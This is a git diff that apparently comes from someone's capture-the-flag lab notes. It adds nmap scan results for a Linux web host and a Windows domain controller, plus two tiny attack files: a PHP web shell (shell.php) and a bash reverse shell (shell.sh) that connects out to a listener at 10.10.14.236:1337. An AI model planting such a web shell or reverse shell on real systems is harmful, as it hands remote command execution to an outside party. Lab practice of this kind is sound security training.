+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCitBp4qe2+WEqMGa7+L3eEgbrqD/tH3G5PYsQ9nMFx6Erg9Rp+jn7D9QqC9GqKdraCCUQTzVoW3zqEd83Ef4iWR7VXjTb469txJU+Y8XlG/4JzegbjO6WYyfQTtQ3nLkqpa21BZEdH9ap28mcJAggj4/uHTiA3yTgZ2C+zPA6LoIS7CaB1DPK2q/8wrxDiRNv4gGiSjcxEilpL8Qls4R3Ny3QJD89hvgEdV9zapTS5T9hOfUdwbkElabjrWL4zs/E+cyHSZF5pPREiv6QkdMmk7cvMND5epXA29womDuabJsDLhrFYFecJxDmXhv6yspRAemCewOX+GnWckerKYeOf
+| 256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEkEPksFeIH9z6Ds6r7s2Uff45kDk/PEnvXYwP0ny6pKsP2s62W3PZVCywfF3aC8ONsAqQh6zy0s44Zv8B8g+rI=
+| 256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINwGMkF/JG8KPrh19vLPmhe+RC0WBQt06gh1zE3EOo2q
+80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
+| http-methods:
+|_ Supported Methods: GET HEAD POST OPTIONS
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: The Toppers
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+NSE: Script Post-scanning.
+NSE: Starting runlevel 1 (of 3) scan.
+Initiating NSE at 22:03
+Completed NSE at 22:03, 0.00s elapsed
+NSE: Starting runlevel 2 (of 3) scan.
+Initiating NSE at 22:03
+Completed NSE at 22:03, 0.00s elapsed
+NSE: Starting runlevel 3 (of 3) scan.
+Initiating NSE at 22:03
+Completed NSE at 22:03, 0.00s elapsed
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 17.52 seconds
+
diff --git a/three/shell.php b/three/shell.php
new file mode 100644
index 0000000..43f9792
--- /dev/null
+++ b/three/shell.php
@@ -0,0 +1 @@
+<?php system("bash shell.sh"); ?>
diff --git a/three/shell.sh b/three/shell.sh
new file mode 100644
index 0000000..d016d50
--- /dev/null
+++ b/three/shell.sh
@@ -0,0 +1 @@
+bash -i >& /dev/tcp/10.10.14.236/1337 0>&1
diff --git a/timelapse/nmap b/timelapse/nmap
new file mode 100644
index 0000000..46d4fa6
--- /dev/null
+++ b/timelapse/nmap
@@ -0,0 +1,86 @@
+# Nmap 7.80 scan initiated Sat Aug 20 10:26:07 2022 as: nmap -vvv -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49674,49667,49673,49696,50981 -sC -sV -Pn -oN nmap 10.10.11.152
+Nmap scan report for 10.10.11.152
+Host is up, received user-set (0.31s latency).
+Scanned at 2022-08-20 10:26:07 IST for 313s
+
+PORT STATE SERVICE REASON VERSION
+53/tcp open domain? syn-ack
+| fingerprint-strings:
+| DNSVersionBindReqTCP:
+| version
+|_ bind
+88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2022-08-20 12:56:14Z)
+135/tcp open msrpc syn-ack Microsoft Windows RPC
+139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
+389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
+445/tcp open microsoft-ds? syn-ack
+464/tcp open kpasswd5? syn-ack
+593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
+636/tcp open tcpwrapped syn-ack
+3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
+3269/tcp open tcpwrapped syn-ack
+5986/tcp open ssl/http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+|_http-server-header: Microsoft-HTTPAPI/2.0
+|_http-title: Not Found
+| ssl-cert: Subject: commonName=dc01.timelapse.htb
+| Issuer: commonName=dc01.timelapse.htb
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2021-10-25T14:05:29
+| Not valid after: 2022-10-25T14:25:29
+| MD5: e233 a199 4504 0859 013f b9c5 e4f6 91c3
+| SHA-1: 5861 acf7 76b8 703f d01e e25d fc7c 9952 a447 7652
+| -----BEGIN CERTIFICATE-----
+| MIIDCjCCAfKgAwIBAgIQLRY/feXALoZCPZtUeyiC4DANBgkqhkiG9w0BAQsFADAd
+| MRswGQYDVQQDDBJkYzAxLnRpbWVsYXBzZS5odGIwHhcNMjExMDI1MTQwNTI5WhcN
+| MjIxMDI1MTQyNTI5WjAdMRswGQYDVQQDDBJkYzAxLnRpbWVsYXBzZS5odGIwggEi
+| MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDJdoIQMYt47skzf17SI7M8jubO
+| rD6sHg8yZw0YXKumOd5zofcSBPHfC1d/jtcHjGSsc5dQQ66qnlwdlOvifNW/KcaX
+| LqNmzjhwL49UGUw0MAMPAyi1hcYP6LG0dkU84zNuoNMprMpzya3+aU1u7YpQ6Dui
+| AzNKPa+6zJzPSMkg/TlUuSN4LjnSgIV6xKBc1qhVYDEyTUsHZUgkIYtN0+zvwpU5
+| isiwyp9M4RYZbxe0xecW39hfTvec++94VYkH4uO+ITtpmZ5OVvWOCpqagznTSXTg
+| FFuSYQTSjqYDwxPXHTK+/GAlq3uUWQYGdNeVMEZt+8EIEmyL4i4ToPkqjPF1AgMB
+| AAGjRjBEMA4GA1UdDwEB/wQEAwIFoDATBgNVHSUEDDAKBggrBgEFBQcDATAdBgNV
+| HQ4EFgQUZ6PTTN1pEmDFD6YXfQ1tfTnXde0wDQYJKoZIhvcNAQELBQADggEBAL2Y
+| /57FBUBLqUKZKp+P0vtbUAD0+J7bg4m/1tAHcN6Cf89KwRSkRLdq++RWaQk9CKIU
+| 4g3M3stTWCnMf1CgXax+WeuTpzGmITLeVA6L8I2FaIgNdFVQGIG1nAn1UpYueR/H
+| NTIVjMPA93XR1JLsW601WV6eUI/q7t6e52sAADECjsnG1p37NjNbmTwHabrUVjBK
+| 6Luol+v2QtqP6nY4DRH+XSk6xDaxjfwd5qN7DvSpdoz09+2ffrFuQkxxs6Pp8bQE
+| 5GJ+aSfE+xua2vpYyyGxO0Or1J2YA1CXMijise2tp+m9JBQ1wJ2suUS2wGv1Tvyh
+| lrrndm32+d0YeP/wb8E=
+|_-----END CERTIFICATE-----
+|_ssl-date: 2022-08-20T12:59:19+00:00; +7h59m59s from scanner time.
+| tls-alpn:
+|_ http/1.1
+9389/tcp open mc-nmf syn-ack .NET Message Framing
+49667/tcp open msrpc syn-ack Microsoft Windows RPC
+49673/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
+49674/tcp open msrpc syn-ack Microsoft Windows RPC
+49696/tcp open msrpc syn-ack Microsoft Windows RPC
+50981/tcp open msrpc syn-ack Microsoft Windows RPC
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port53-TCP:V=7.80%I=7%D=8/20%Time=63006973%P=x86_64-pc-linux-gnu%r(DNSV
+SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
+SF:x04bind\0\0\x10\0\x03");
+Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+Host script results:
+|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
+| p2p-conficker:
+| Checking for Conficker.C or higher...
+| Check 1 (port 64147/tcp): CLEAN (Timeout)
+| Check 2 (port 32357/tcp): CLEAN (Timeout)
+| Check 3 (port 16288/udp): CLEAN (Timeout)
+| Check 4 (port 22941/udp): CLEAN (Timeout)
+|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
+| smb2-security-mode:
+| 2.02:
+|_ Message signing enabled and required
+| smb2-time:
+| date: 2022-08-20T12:58:39
+|_ start_date: N/A
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Aug 20 10:31:20 2022 -- 1 IP address (1 host up) scanned in 313.10 seconds